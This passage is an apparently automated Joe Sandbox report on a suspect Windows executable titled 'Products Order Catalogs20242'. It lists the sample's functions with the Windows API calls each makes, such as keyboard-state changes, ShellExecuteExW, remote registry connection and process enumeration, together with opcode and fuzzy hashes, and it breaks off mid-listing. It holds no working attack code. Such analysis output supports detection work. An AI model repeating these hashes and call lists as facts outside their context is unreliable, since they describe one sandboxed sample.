                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConnectRegistry_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 535477410-0
                                                                                                • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                APIs
                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                • _memset.LIBCMT ref: 004538C4
                                                                                                • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                • _wcslen.LIBCMT ref: 00453960
                                                                                                • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                                • String ID: 0
                                                                                                • API String ID: 3530711334-4108050209
                                                                                                • Opcode ID: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                                • Opcode Fuzzy Hash: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                • String ID: HH
                                                                                                • API String ID: 3488606520-2761332787
                                                                                                • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                                APIs
                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                • String ID:
                                                                                                • API String ID: 4082120231-0
                                                                                                • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                APIs
                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                • String ID:
                                                                                                • API String ID: 4082120231-0
                                                                                                • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                                • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                                • String ID:
                                                                                                • API String ID: 288456094-0
                                                                                                • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                                • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 004449B0
                                                                                                • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                                • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 87235514-0
                                                                                                • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                                • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 00444BA9
                                                                                                • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                                • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 87235514-0
                                                                                                • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                                • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                                • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConnectRegistry_wcslen
                                                                                                • String ID: HH
                                                                                                • API String ID: 535477410-2761332787
                                                                                                • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                                • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00457C34
                                                                                                • _memset.LIBCMT ref: 00457CE8
                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                • String ID: <$@
                                                                                                • API String ID: 1325244542-1426351568
                                                                                                • Opcode ID: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                                                • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                                • Opcode Fuzzy Hash: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                                                • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                • __wsplitpath.LIBCMT ref: 004737E1
                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                • _wcscat.LIBCMT ref: 004737F6
                                                                                                • __wcsicoll.LIBCMT ref: 00473818
                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                • String ID:
                                                                                                • API String ID: 2547909840-0
                                                                                                • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                                • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2354583917-0
                                                                                                • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                APIs
                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                • GetMenu.USER32 ref: 004776AA
                                                                                                • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                • _wcslen.LIBCMT ref: 0047771A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$CountItemStringWindow_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 1823500076-0
                                                                                                • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                                • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                                APIs
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                • String ID:
                                                                                                • API String ID: 896007046-0
                                                                                                • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                                • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00441493
